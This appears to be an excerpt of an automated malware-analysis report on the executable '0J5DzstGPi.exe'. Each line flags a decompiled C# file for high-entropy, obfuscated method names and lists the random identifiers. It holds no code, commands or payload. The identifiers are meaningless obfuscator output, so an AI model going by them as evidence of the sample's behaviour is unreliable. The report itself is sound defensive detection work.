Source: 0J5DzstGPi.exe, x5JQFb7BYScHV4QEjXI.cs	High entropy of concatenated method names: 'dKqcWbfl2OvgLd00s45u', 'vjH5poflrGSfhqt2YXVQ', 'AiQqPhfl0qVhsiG0EmQb', 'C5gEfkflGFgupMkO8RRy', 'method_0', 'method_1', 'Q8D7ImHmiH', 'hRT7wIyIA9', 'h5W7cu5RmV', 'dEg7LEFcnT'
Source: 0J5DzstGPi.exe, XfLyyVWePZenQsmSQar.cs	High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'yYZfxW9RTbu', 'ETMfWfYEqoJ', 'm23bXEf68m1QCtp1mNHL', 'wguIOTf69VuUT7TuXs3h', 'cudLCUf6UrnhjfIaGbkA', 'jHWr27f64j344ec4Ua05', 'zBRvJ8f6PQTNiJWcKOhn'
Source: 0J5DzstGPi.exe, gYWRrLxVCLqsyK9rFbU.cs	High entropy of concatenated method names: 'XuuxneswNw', 'BJmUpjfsPO9SsgQnd1Os', 'fWNWPtfs6fuBZPwekFu0', 'fyGccMfsp6W2JKx7lji5', 'cTbi78fseyNc94STNw5I', 'pjuIegfsDCgirmT4nosG', 'uAAjdRfsUTPoysCWopIi', 'tSm2Y2fs4G0h5yqZggFE', 'K3sQpvfssI9QeQFPh2HE'
Source: 0J5DzstGPi.exe, slihgVhfuALZkNAMNDr.cs	High entropy of concatenated method names: 'pxbh1O8qji', 'VUNhWAZm9o', 'hrbhEnrHNc', 'NOe7bVfeT7r1Fx1i1fhM', 'pQFupXfezUZPwJvIfPKq', 'Lk9BcEfDgeW63oCtpnuX', 'qk7KV8fDfTLn8kby08Ch', 'epOG13fDy6vkEi1GLEV6', 'MP93HEfD1CPefss12m2c'
Source: 0J5DzstGPi.exe, lUWBpiEApoLxjJ8iTcU.cs	High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'LoofxEEKBPM', 'ETMfWfYEqoJ', 'wYOS5XfpvcZw4M5CXXH2', 'IaJfh4fpQveqDFcMY7h5', 'IpNraAfpijwbYdKtAbv2', 'opyfXHfpkhdgRNobr4SP'
Source: 0J5DzstGPi.exe, YIDeagDavg1hapD64Ls.cs	High entropy of concatenated method names: 'EJaDt762sB', 'k6r', 'ueK', 'QH3', 'MYKDYriVlH', 'Flush', 'r5rD0M8pjj', 'k9LDGyFvuK', 'Write', 'vXfD2DuArL'
Source: 0J5DzstGPi.exe, seWTy8Wd20YneQcOUXk.cs	High entropy of concatenated method names: 'THBWFxW2Rh', 'em1clrf6rGlgFCs61a8F', 'w4jdsUf6FNLi1nW8Od59', 'HnULJnf6GSgwJ3df83LT', 'XNIu5vf62cQNirepXpJX', 'oo1OVpfpfLCseWNnQS8N', 'bD7vlif6zJbjPfn8vNhy', 'EqoASTfpgqcqEEFwnTDt', 'S6DEuYJfav', 'jHXgb4fpEbASwwDpRPtX'
Source: 0J5DzstGPi.exe, cp7mNTcYrUAdRh98u8E.cs	High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'AEjfxkQ6GqJ', 'tNGfWb0BrDw', 'xIihmPfSyDjWB0AxHXEi', 'cF2EYrfS1I12IfjENsRU', 'xMvPFQfSWL3H4nDsKo5B', 'dnx4cbfSEDO8dCxKi7d5', 'jHchpvfSuYI30E7QpgPU'
Source: 0J5DzstGPi.exe, l3PF4AypI37qlOXyKh7.cs	High entropy of concatenated method names: 'WQLylnZJ06', 'NdPyjKY92W', 'OSUZ6Mf4edCYvIUB9LdC', 'O9qicif4DMoKQlbjpTql', 'LABvcqf4syO1HTEDBQg8', 'UCWymCa501', 'deKuKyf4qAodWPlBNe0Q', 'oOQQZvf45mdNsmMwljUw', 'h5H2yhf4O7jVjqy8ApM8', 'xj65Pff4dfVYJLcC2ML2'
Source: 0J5DzstGPi.exe, WPgrCyLMj3R5GmJknPZ.cs	High entropy of concatenated method names: 'k3WfxomL6Ti', 'EUWLHM6DPq', 'kehfxIjQc9X', 'lnNfVrflyZ06wvP4uw2q', 'z4GhrDfl1bPmQNHvT6CR', 'tpCikZflgGBFyxhwlk14', 'PYTkVwflf1E2ssNH3XSK', 'FTNMlSflWbGwYvxVjQFw', 'pwlgVXflEYvFrK5DZLr4', 'T7b4DDfluvoyrcmt4MrO'
Source: 0J5DzstGPi.exe, cK3JUY7Q2suiEhhYSMT.cs	High entropy of concatenated method names: 'Rrr', 'y1x', 'eq7fxVLLgsW', 'lwWfxZyIwDU', 'g9VxSUfl4wEOVfjAAhBo', 'P2Q41FflPurwxw3vJgm0', 'PSXEAVfl6pbKosdUYVmN', 'XClDgoflp9i48mH87Pik', 'xVo40ifleSaFA2OI10la', 'bF1ZX3flDk26andUf9rY'
Source: 0J5DzstGPi.exe, ACrrJNyEteMjvtsMEh6.cs	High entropy of concatenated method names: 'UojyhZwXOg', 'EqHyx7XIN5', 'EpcyAT8Ax9', 'WbpyvH3dYd', 'QJvOWUf4vKLQrcYKMYgv', 'z1Iyf3f4xblyTcfUBDp2', 'l4t3AAf4AapJ0xILGahv', 'cGO0yYf4Q6tovi6R3j05', 'HAAnSkf4iImop6B1fryN', 'jraLlAf4kKY0QLOtK0xv'
Source: 0J5DzstGPi.exe, w78XqoxvCK0EhTvk2pq.cs	High entropy of concatenated method names: 'zNVxilR5IO', 'KMCxkJ3dxp', 'ttYx3jBah2', 'Lp6VP9fsv0dcuj7m0ZtC', 'RF4jXnfsQAGULWYHqqAd', 'FAHji6fsx3daVCqNhbi8', 'JnaDtdfsAL80isrQbPEl', 'TQMUBafsigeuZRn7fa5f', 'lCxRf4fskCTIbiXar496', 'nCu0cafs3C5WxNZdea37'
Source: 0J5DzstGPi.exe, nWZKuu2gS6PcQre7cK6.cs	High entropy of concatenated method names: 'oWp2WLhSEU', 'tlp2EeJpgA', 'zi5oaKfrwN5G2seKjXk6', 'BhWOu2frcsLfwE0MVoep', 'tVtMeMfroEL1p0TacYfY', 'TJ4eDUfrISnJEMrXolSW', 'FUZDpwfrLxOf9M5s0it8', 'c8GYxFfr7peIVEvn8pN2', 'Ak02y0UQUi', 'kvB7EMfr3WgiTQvYc5xl'
Source: 0J5DzstGPi.exe, YAX23VqpZKVIDw64V8P.cs	High entropy of concatenated method names: 'HtCqDdDutL', 'YLuqsyGBiO', 'Qh8qNrPJXN', 'JH7q5GKQBu', 'LFJqOC2Hrd', 'uqtqqNmpb3', 'pi7qd2PLMU', 'IJJqSBLDmZ', 'KVkqlMHIBc', 'MS8qjHMNBc'
Source: 0J5DzstGPi.exe, Tx3rTpXUb3TcOK5KJu.cs	High entropy of concatenated method names: 'IndexOf', 'Insert', 'RemoveAt', 'get_Item', 'set_Item', 'method_2', 'Add', 'Clear', 'Contains', 'Uq7bMjmR1'
Source: 0J5DzstGPi.exe, dcigBOSNBnbSUJw1YIe.cs	High entropy of concatenated method names: 'uDB14kf0ZVRd4j0pnZfs', 'KC09X7f0nMdjxvLuUqIJ', 'SLrEq5f07V8rvKwix4t2', 'qZ4Nhof0Vw3lMUCVlSiW', 'y09EMNf0INVVUjYlHcGq', 'ifcGaef0w3ppJhQc1RWs', 'xCo5ILf0cGGowCrQxAon', 'z6AkNwf0BXDuuhKu6WFk', 'Pt1Wejf0o3xQ3IBKPXwy'
Source: 0J5DzstGPi.exe, tiNLHZe71d4Nem6IpUf.cs	High entropy of concatenated method names: 'ayxD3WEhQW', 'EBSICDfaL1ZllNwCnIRs', 'cH8XvUfawCvbkTvKSUOK', 'tCY6P3facpiBf6DwMDs4', 'IMUwBRfa7JhOECS1Beqi', 'kt5', 'NSseZWoUb9', 'ReadByte', 'get_CanRead', 'get_CanSeek'
Source: 0J5DzstGPi.exe, OeSX1UnvuIYXkMucbbd.cs	High entropy of concatenated method names: 'YaPnpsfybS', 'jL3niIZX6G', 'gdVnkhFgKl', 'Vgln31fg8I', 'cKjnKJi8a7', 'p3LnBjIaHo', 'vMbno51DQH', 'f3anIWqA2i', 'C31nw5nogF', 'xAdncgsXrd'
Source: 0J5DzstGPi.exe, tnKnhrPpCCJ2N2lhfPw.cs	High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: 0J5DzstGPi.exe, L7MpOuxEAx4bbs175M5.cs	High entropy of concatenated method names: 'O3I', 'P9X', 'fQjfW8wJqtO', 'vmethod_0', 'imethod_0', 'rdmQiZfs17tNGfxRWt5M', 'g7cbXdfsf8KIgDPFkobd', 'Sn9MjEfsyixS9wF8P5Nv', 'I6gIG6fsWk6su0F6cIip', 'c6KcrUfsEJaCHmy25i1B'
Source: 0J5DzstGPi.exe, fEbKkLL3B6vKRnfPMkp.cs	High entropy of concatenated method names: 'zDkLLgBHi6', 'fmFs4YfSpjlYKaUNZ9rf', 'iWkIyNfSP8Y4N8UFfOm3', 'A52SIOfS6Iasl058u16A', 'Hqg9VyfSeJb1C4tFZCf1', 'pK6LBCYDSO', 'Vqup17fSRZAxOvWf39Sh', 'lUpJt0fS8QWHag8pIH3i', 'ewCGXNfS9ZqvLqGOIEJV', 'DpofwDfSUUHi1VIy1RTD'
Source: 0J5DzstGPi.exe, ClS6ZS2Ih1e0y9FFSfj.cs	High entropy of concatenated method names: 'RlYQaWfrdZWIwwic3cQL', 'V65vPWfrSGZ0qmnFheo0', 'fdqrYEnUP9', 'tq7c0dfrJElDApE9kiin', 'faXnF0frbdlKWujZdQmZ', 'KGWO1JfrmBQqx4faraV3', 'cCifrlfrCk75FbV8OQNP', 'q7QJNWfrMnuIYDL3hxlC', 'XvuKWMfraKFf1JqBcUdm', 'ioZjIlfrHFvLc9y3lRGu'
Source: 0J5DzstGPi.exe, tDT7AVhless8YreUjPS.cs	High entropy of concatenated method names: 'Q4FhGfMRp6', 'Huth2LFupj', 'An4mn8fD2Bw92ij2Ly26', 'UQ1LaLfD0ZQGbOgPBY3q', 'M4PHHgfDGJlDJkaYbCUB', 'zd3ZSYfDrXtRe8YwY9DH', 'G8xhXByveA', 'OtthJG63yo', 'qGAhbcASJR', 'kd9hmoX604'
Source: 0J5DzstGPi.exe, GfRpmkW8kptWio2Gt9r.cs	High entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'm1Ufx1i7i2i', 'ETMfWfYEqoJ', 'dnm9P7f6ILPQg9VNAEtR', 'anaMOHf6wWWDYXX05pTH', 'GBGwwpf6cCYXkwlrt8D2'
Source: 0J5DzstGPi.exe, UyMXTeU18XcdyvB7ko4.cs	High entropy of concatenated method names: 'method_0', 'YU8', 'method_1', 'method_2', 'x6wUE3raOU', 'Write', 'YF3Uuv9lku', 'sPiUhvCtV8', 'Flush', 'vl7'
Source: 0J5DzstGPi.exe, Qu15Y0pxs74LfotAJ7D.cs	High entropy of concatenated method names: 'bOqpvOHvHo', 'YOxpQZkgQQ', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'MNEpiQroa6', 'method_2', 'uc7'
Source: 0J5DzstGPi.exe, FUYNanzGT4RvkxNcbW.cs	High entropy of concatenated method names: 'o3Zff4Lj99', 'HYnf1meA9s', 'u0WfWX77PU', 'gbifEa1k7b', 'p6mfuVRmbr', 'hVyfhL7PKY', 'RExfAbJlpH', 'BA11XhfUWuGaJ98yNJlC', 'cLmOHdfUEdM254UxSMxT', 'MG6ItyfUulN2T6XkGsjb'
Source: 0J5DzstGPi.exe, cT0dSkEBnGrl8sWbMRA.cs	High entropy of concatenated method names: 'qcIEUQjj5O', 'MXHE4aefQN', 'eY1EPOhQTH', 'JEE0QyfpDPusJ1DL5XKP', 'GHj8pffpp6jZAdflJyXL', 'dYIu9sfpe603gtXtb5cc', 'wU4emSfpsPisNMExCoSR', 'gZSEnuYHeO', 'HgBERGK0Wb', 'aKNc32fp4h5JVRoLduuI'
Source: 0J5DzstGPi.exe, gqA6CbYplauKQbd273a.cs	High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'EjcYDv6stp', 'jOG3QdfGkmvQJ1shWvLF', 'UfiYY1fG3Vbp1rnWZOpc', 'mS6NrFfGKrh1drQJtpu7', 'ST9ifefGBGH5WdfIDabi', 'XIJTA7fGoEerDPaJMJkD', 'ieUmgVfGIjObCi1VNC64'
Source: 0J5DzstGPi.exe, bJXr4AA3br1hRKqef0t.cs	High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'zvjwDbfNZ1px9kk025cP', 'sdW4khfNnanX7j8VGAuD', 'JWHWfdfNRfNyQk6umuMy', 'sFbABIfsrn'
Source: 0J5DzstGPi.exe, SHlZ3d6JVmT62f8YIWW.cs	High entropy of concatenated method names: 'wHg6mSUSmj', 'QyD6Cfx2Yl', 'FTJ6MEqGql', 'iAq6avtl9p', 'ggo6HbU3Rj', 'eVVTTDfMkuq1C0loxXiQ', 'vW9s2ZfM3Zd2Mdkox2Vv', 'gOE3dQfMQ5NkC1y7BuLg', 'S9uW7bfMidTKw1OX9niK', 'UJstS6fMKyU572gjeCNL'
Source: 0J5DzstGPi.exe, UvyavsPS0LCBLWc9qh2.cs	High entropy of concatenated method names: 'UBrPj0QiIZ', 'pRBPXtAOlL', 'o0YPJ5W3o5', 'boIPbsdCiP', 'RSIPmEq36x', 'ASrPC0ufOX', 'qqlPMah76r', 'dlpPa5cLxe', 'I5CPHQTjwo', 'SMyPtfLxiy'
Source: 0J5DzstGPi.exe, vvdjhF8n1wPyhf1163x.cs	High entropy of concatenated method names: 'PEk883DDhE', 'MOS89Ipsqh', 'QZ38UsvZn9', 'SrX84kJxU0', 'SVF8PaIRhx', 'saDDyufJ8OnFUNBB6C86', 'cC4mTlfJ9mT3rOELBxvq', 'HxvjnrfJU5Af1xFyyG4d', 'Jah5j7fJ4QSU0uDkauQm', 'RBLD0WfJPON6vNXDbN74'
Source: 0J5DzstGPi.exe, f94En3ulAncEy5Cnpwj.cs	High entropy of concatenated method names: 'qmcuG9MCRq', 'EG2u2S7gwZ', 'Y0hurWKgBh', 'fDBW1Yfer9gsHnwKRLCf', 'gQgmBafeG0ekLs8PGFJX', 'bMBV3Afe2VtYtJjIkWdd', 'eVKuXi0buu', 'WmHuJIbQ9i', 'XZhubqJukX', 'A2JumAxune'
Source: 0J5DzstGPi.exe, FEYqa6EXfN1YWdL9Hgb.cs	High entropy of concatenated method names: 'q82EMyqoqX', 'istIJafprjFJdM9b3UXn', 'OCikpkfpFAv7ylQRNdIW', 'oosSQRfpT4SFjsJKCGRL', 'tijZQ1fpzbLsgmhhFY1G', 'U1J', 'P9X', 'vVdfWBo9kwt', 'BqTfWohmwZY', 'S3QfxhcNMh6'
Source: 0J5DzstGPi.exe, LRYQdInHSkZINGlhYe2.cs	High entropy of concatenated method names: 'gTJnYvmhIM', 'sI6n0GYrcl', 'EOsnGryspm', 'HAbn2J3y01', 'Iv4nrSqwKS', 'jHTJsXfXUcrh5FG9SaGS', 'B2ZKixfX8YRLv6Rc3tBK', 'fQ9gbafX9nYDIIER59MP', 'CpwfwrfX49kQUyCNHayH', 'jKfjBffXPqDNeecqIQYn'
Source: 0J5DzstGPi.exe, OOHDZrfT5GZwckofQ1c.cs	High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'UcAfxfTgjDJ', 'ETMfWfYEqoJ', 'Nvm2ASfUGhf8JUlV3Ail', 'bF7Pb4fU2Gov8FWQ8QYN', 'fRJeOUfUr8y7mmYCvOYO', 'L2UXhPfUFQyh6pISqOZw'
Source: 0J5DzstGPi.exe, WQgIKshpgTJl03Ma3KA.cs	High entropy of concatenated method names: 'id9hDZsG2Q', 'CNEhsABQPp', 'DrdYpefD5aNSMaQjK2GS', 'X586knfDsZZ8mefCdMM6', 'VaU7EGfDNlLMxKfxsHdI', 'rxGKrmfDOKTvI9SGMHGe', 'zFXUA4fDqJUBjUqMYeWl', 'pUsXBsfDdZDrMfcnuWtf', 'qUcAdqfDSmTBxK1xWybB', 'y4RwdyfDlXQ0c65U9RPR'
Source: 0J5DzstGPi.exe, g5vLjHfY3Df47RpeUw3.cs	High entropy of concatenated method names: 'P9X', 'qpffGAFXZl', 'XT7fxgBYItq', 'imethod_0', 'NTxf2GjPSE', 'rNah1NfUHnsVQDWu2X4g', 'BmLQDafUMdKyr7AJU756', 'sfBLGVfUafN3xgCgK578', 'ygK3PifUtC4etPj2c2IE', 'mSGtpmfUYQpZ7sNO0ZUM'
Source: 0J5DzstGPi.exe, kVff6WKQ5NEZUtyb0nb.cs	High entropy of concatenated method names: 'Dispose', 'HvRKkIVRBV', 'wF9K3wn2TT', 'wR0KKs8OYN', 'C6c0l4fOq8AJFqZ1MIxm', 'VMl374fOdBpq7K3t0QC8', 'tmLrU2fOS8I751INmJk6', 'YdTYaLfOl50PQdo1BVQi'
Source: 0J5DzstGPi.exe, xfT9GJhc9XPRXa0JE7f.cs	High entropy of concatenated method names: 'aWRh4TLquX', 'OXU6fyfDpp4HVO79fxbV', 'y66MsufDPF6aH8SW3Ilg', 'p72ogsfD6aAV5nhKSHQK', 'c9s9oTfDeVdaeiRcy8oE', 'v9Fh78FTcy', 'GKLhV0C7NQ', 'iv2hZVZwyw', 'NtkhnrCKXu', 'pu8oY0fDZixZnDKg4CYm'
Source: 0J5DzstGPi.exe, ppUkCN0eoevWvD2pYAA.cs	High entropy of concatenated method names: 'gwA0sZhqjT', 'wbn0NXxvmB', 'wgU056T0TL', 'A8Z0OyYYaZ', 'fT60qa5AOf', 'VgL0dsyu2I', 'Kr40SpiCUY', 'ctj0lXd78e', 'ptS0jiM6C6', 'HQG0XY63gY'
Source: 0J5DzstGPi.exe, QfRtxZhABLkYBtAHAUg.cs	High entropy of concatenated method names: 'ytehQfE3e7', 'tSqhiH7TA4', 'Xi0RbRfDhfQVhUt0YDu3', 'nuV8vgfDEhnvXLwnCkof', 'l6GrQNfDuob5xITcXT7D', 'H9JK4ofDxChjXxes6jIi', 'nImOvFfDA0nyg3Ltjb3S', 'd22FkkfDvmdYrge74N0w', 'UF4JamfDQBcURqy68UWg'
Source: 0J5DzstGPi.exe, ctXDg319nqNX5QI3bwV.cs	High entropy of concatenated method names: 'e3U1jEG6Fq', 'Dir1XkDb4J', 'wav1JH4b9O', 'rcoCdffPq98sfapuDwJ0', 'RMr0YPfPdZoW8sVCrrof', 'nR4fWffP57BdshgXOGUp', 'jehm6qfPOb18bOhxdyBx', 'pEe14TbtfO', 'yaw1PwOX1w', 'JYo16ueJ7P'
Source: 0J5DzstGPi.exe, qYwoKuKZHFKEvbLokgI.cs	High entropy of concatenated method names: 'IkAck0et4F', 'JEFc3bxANl', 'VhL5wBfd9XkQe2WjpWLo', 'YSN9GhfdRmLHI64a6ujN', 'VVhOLZfd8r07btQcEbo3', 'mNsQ2rfdURtDyI0PWFMf', 'ItgccspITF', 'OCqMgLfdp7ZHiGMbfcUC', 'TEEohyfdPZH7KV6P8NVl', 'HNyDHafd6tFqcquvRvVX'
Source: 0J5DzstGPi.exe, tmcNZxGpo5Jxo8RUPcN.cs	High entropy of concatenated method names: 'shRGDVGoSE', 'MxeGsgule6', 'XxeGNDnhwb', 'yiaG5HgSxu', 'Dispose', 'FY5quqf2tf09h63x9q7y', 's63n4Ef2a8tjml0Lt0JF', 'sqax02f2Hr4sMX0ighVr', 'DOSMsSf2YVpRgRmjBh44', 'sCGQvBf20FGyIZA8kYma'
Source: 0J5DzstGPi.exe, AMvDBMxUjgQ0pGc5bKy.cs	High entropy of concatenated method names: 'ToSxPgmpym', 'scCx6dmc5x', 'BtUxpVO36o', 'JlbxemgfD7', 'y0AxDtsTg4', 'YiVxsfuX8S', 'QKejEEfsljn5F4ndyHir', 'ocmw7Bfsj3UpOhhEQmiV', 'PLletffsXwkZ45xXUi3q', 'gDuLmFfsJjkikCpjrUgZ'
Source: 0J5DzstGPi.exe, R8BCUXRXVe0ukpXShPu.cs	High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'I5NRbJtho5', 'AQYRmVwMkF', 'Dispose', 'D31', 'wNK'
Source: 0J5DzstGPi.exe, P2UZWNuR01UYOPTbIVV.cs	High entropy of concatenated method names: 'p4iuplQBM7', 'pYyvEXfepCZceXiew3a7', 'irKHnffeeYaceU2EIKHB', 'oONLirfeDYOABQkOPo7l', 'k0d6WXfesloykHxTFah1', 'E94', 'P9X', 'vmethod_0', 'P83fWLGcQDZ', 'LWkfxAgpWUE'
Source: 0J5DzstGPi.exe, RRoPwYxF5T73VtRWm2g.cs	High entropy of concatenated method names: 'P9X', 'imethod_0', 'as1xzGycEU', 'R8dtG0fNyHB5Y27LTFxD', 'm8Ccn8fN1y3vmLXupXx8', 'Ma1r21fNWkZqlUyE6yTf', 'nVPpsKfNEJR30TSnFaAE', 'cfZtJufNun8XgPdtJwmk'
Source: 0J5DzstGPi.exe, mOA2uTFdbev6e6QxQYb.cs	High entropy of concatenated method names: 'XRIfueIHbi4', 'k0MfuDpr6iX', 'DXrfusb1Zpy', 'IlVfuNVydCK', 'Igjfu5X9IgP', 'e7DfuO53NTI', 'GrnfuqTm2d1', 'IUFTET8WXc', 'YTmfudYIhbR', 'aIFfuSPBe3R'
Source: 0J5DzstGPi.exe, NR1ROe4TRc0gUAJF882.cs	High entropy of concatenated method names: 'qdEPgyWbGV', 'jwFPf6hcC9', 'gXQPy49YsP', 'ivxP1cprPW', 'CHBPWL4PP0', 'S8NPE5yXCe', 'HR0vEGfm434k0MWNxaT4', 'QtZsZLfm9EWynBCvwSQL', 'mlxgJCfmUTjaXGZgCFuE', 'M1P4RCfmPXrLmXYEQ72j'
Source: 0J5DzstGPi.exe, oIAFwYEHDN98ZKRh9UQ.cs	High entropy of concatenated method names: 'uIREr00Evt', 'sUMEFaVUAS', 'GHXETlicpJ', 'DdNEzJOcPs', 'KxUugibQce', 'caJufv3hi8', 'Egouys4FmO', 'pKOHhWfexYXriDNJa0mJ', 'PsW0oyfeucOLBMOQteZo', 'esApqjfehHdMVPqali4J'
Source: 0J5DzstGPi.exe, aXL0Xo9QubQh3LFLu63.cs	High entropy of concatenated method names: 'CT99ksp3On', 'rY793VjmO6', 'JSa9KOHeSm', 'keh9B5mqaL', 'cVK9oHwCmq', 'kjqU3SfJCERa9k6otbaZ', 'aroKdQfJbXGWYATA4B2m', 'Qff1xwfJmyaFIwC2aVXq', 'elyKGvfJMxxLrryHto2L', 'jqlYwYfJa96LOu7M0dP7'
Source: 0J5DzstGPi.exe, aWXTNe1aSiawmGI6Khs.cs	High entropy of concatenated method names: 'eYrW1WtwH8', 'B9mWWCmayD', 'PEYWEuHvGd', 'R3EIGEfPT3Eu4yTPrNDS', 'wOcDgifPzHYupciQaYpd', 'mGfojrfPro5cOU1ALi4R', 'pq8K8IfPFgmeFxQvi0AZ', 'VpJWQKS69O', 'OjSYZrf61ZVUbuhA7ARL', 'MMXGtdf6fTfwAnGmytju'
Source: 0J5DzstGPi.exe, eruFScqJnIkTREZRfTN.cs	High entropy of concatenated method names: 'hrhfxRa6L7f', 'hI5qmYN39q', 'vT1qCHsuwl', 'PktqMS8ELa', 'RLRAkCftG5VG0RtH1EN4', 'z2qhTVft2JAW2Y1c0HTi', 'U2MBJlftr6FeBnIBcApN', 'keIcwRftFRoOl8VhMD4a', 'pJo0qGftTjfNwqPr1r29', 'PsLTuWftzZecl39X6E79'
Source: 0J5DzstGPi.exe, FrkKQ5Ulqic6x7ZyPes.cs	High entropy of concatenated method names: 'dusUF4uIcE', 'ktrUz4qIHC', 'ggIUXXnvWf', 'OSdUJefUkx', 'QJlUbA5MmO', 'k6MUmpKA7D', 'aKvUC7YSKF', 'HrRUMWVFcw', 'DiuUa6K67t', 'fTdUHsuxdk'
Source: 0J5DzstGPi.exe, YWggNBIOo3TkWGVyT5.cs	High entropy of concatenated method names: 'rjvsaYSL2', 'MndMabf9pKdEjSuKYca3', 'RJolhJf9PGG1x2lx3Ipa', 'MeK8hof96Dv9guHBl9AG', 'SsIcni6IH', 'GQiL7a1xu', 'mLk7JZvGR', 'p0MVcBoeq', 'IBlZPuIPm', 'yGXnxJM2a'
Source: 0J5DzstGPi.exe, nAJhFXdpB8qWa0VNv0a.cs	High entropy of concatenated method names: 'TyBdDPjZ0o', 'r0CdsrKUAC', 'CB2dNOyH32', 'WkFd5cXJxK', 'efIdOf0o1X', 'zeNdqcjiG3', 'ILedd3XQp7', 'rGydStxAXk', 'LLgdln9MKi', 'Chsdjpk63G'
Source: 0J5DzstGPi.exe, dXHRx6VkWaOfGyhe9t6.cs	High entropy of concatenated method names: 'rixnfUw6wD', 'iiVL0nfXyRyqhyEmgqZT', 'tUJ6n2fXgTSXK4gViy5L', 'sceptCfXfUpMFFLxdYk7', 'rBxVK8OI9k', 'u6PVBK2fvs', 'taLVoMUSKb', 'OBYVIJII7T', 'ouRVw4NgAR', 'I1NVck0SHV'
Source: 0J5DzstGPi.exe, x80q51LGNsHW32VIfCj.cs	High entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'lbLLrZnwBK', 'N3Nfxw1rseJ', 'eAQDlFflv3uHnYDbby48', 'b8W5ywflxICP7r4WicHt', 'VLZ1OOflAiBuHpA2q9Tv', 'v3YS5nflQX8sqaSZ6Ay1', 'y1HgkJfliKkJTksEjJeS'
Source: 0J5DzstGPi.exe, KJFkwBsaBQPqUBV0yYV.cs	High entropy of concatenated method names: 'qV1lqDfHDwX99JnP1Pir', 'q200VkfHpoYvsygS3fmt', 'AFHnyafHecxLZfW7XZK7', 'CWZ86LfHsZvPKHhKoCen', 'MwmstfcFK8', 'Mh9', 'method_0', 'kw9sYH4tXF', 'jKCs0TS3B0', 'V2DsGwbDQo'
Source: 0J5DzstGPi.exe, twVfRtxoAJ89Z7iw0Qc.cs	High entropy of concatenated method names: 'Tn4xLDFmH2', 'eguJYDfsRuJBcnPw5saT', 'WZGDeyfsZ3vmWSW2Wxgt', 'eGCubQfsnGVogDRuhSUE', 'hBTVKofs8DOrTNxpmu9Z', 'Gc7xw1oXij', 'LvNRBGfswoSiX9kO4XYl', 'FgVK1GfscvfLMjf2Kk7A', 'HNp0N5fsLlX2mUX6LOki', 'PQ6oqffsoOC796yKFsa7'
Source: 0J5DzstGPi.exe, T8bYCl6TuZnHJ7cUAqe.cs	High entropy of concatenated method names: 'bsepgOXfIK', 'bX1pfgLpYf', 'Yd7', 'Y7CpyKGg5n', 'zlDp1wQAVg', 'jgYpWKnL6O', 'E2JpErajXX', 'GC1wjSfMnWTmys0OKy9J', 'k3jYT5fMVNRg1SE8wste', 'Q6SQ8IfMZWuIHitH5T9p'
Source: 0J5DzstGPi.exe, HYqa309pfyTbQ3JiUcW.cs	High entropy of concatenated method names: 'method_0', 'TZy9DTeFLw', 'uLP9s8gRFP', 'LbT9NJo7S8', 'TDL95fpcEH', 'oct9O9e4IR', 'z9S9qtv5TG', 'MHbOQEfJzKGqGlDDmBJV', 'IqBRLbfJFx6YyqPDSlx1', 'Ciu9yEfJTW9BuRDa1dAq'
Source: 0J5DzstGPi.exe, NXdNK8usoPYB2FPcdf0.cs	High entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'zirfxvlW1M6', 'ETMfWfYEqoJ', 'D55Xnyfe5lLnlvbNDmF3', 'R4nXYrfeOW8DJuVFTOMp', 'w4djNOfeqbw7x0i8bwue'
Source: 0J5DzstGPi.exe, f1T9v85NK7rFFgNwiU0.cs	High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'xBtLsAfHzbcFMO8lZusm', 'i6iQYFfHF2NZVbZ3BjNB', 'uicA5PfHTvNIWJxVKyKV'
Source: 0J5DzstGPi.exe, pd3hHLqAPchGawu2Raj.cs	High entropy of concatenated method names: 'N7WqRR0vsk', 'syQ0n2ftdBiC2xZq4fAM', 'iq4Kx7ftSJjrQIytGT8s', 'GSLm5RftlSjtKo5rOEhH', 'U9HKkVftjZDLLhKdHdRD', 'IPy', 'method_0', 'method_1', 'method_2', 'vmethod_0'
Source: 0J5DzstGPi.exe, irqJEDcqWUa4u9W4Ocp.cs	High entropy of concatenated method names: 'SOvcbilaSO', 'qBrcmJ8HGI', 'kY5cC9bOxY', 'C7eaRsfd0DjMBB2ffLY8', 'YfiuitfdGfXefHKsaMQT', 'rubQ4FfdtLFRKTOM3n5W', 'XL3mbSfdYicsH9J1r1P2', 'xD7cSQmCF9', 'd0KclJte5r', 'rG9cjVA4mY'
Source: 0J5DzstGPi.exe, Q1orN8DNcwsLbvBwVgm.cs	High entropy of concatenated method names: 'Close', 'qL6', 'pWdDOTeAa1', 'WFQDqEAysk', 'H05DdfJMeE', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
Source: 0J5DzstGPi.exe, Ubi3tqd2mvd9IsmalZh.cs	High entropy of concatenated method names: 'Jk1dFmx9MV', 'dqSdThcNGb', 'g3TdzJjDuF', 'adRSgGsfDT', 'g4RSfIkkFS', 'uAnSyNBM8p', 'XYmS1cA18n', 'LBRSWFB2B7', 'utBSEvQYIV', 'f65Su26Rye'
Source: 0J5DzstGPi.exe, aqmFxEyaM0x72p5x4GV.cs	High entropy of concatenated method names: 'rvD1hxNcEW', 'CdKT0Zf42YF6DZZTDvSn', 'MKOqRlf4rjRYwMQefNCn', 'ilhrtef4FXUFRlq0psZr', 'Q85OSpf40FOSA2PWBbfW', 'dmelXNf4GNveUDxJrupD', 'sXPYecf4TUrun4pce1U9', 'UrObBDf4zFRZQ5j65NN9', 'BUj1gUrAGl', 'sy11yUeLve'
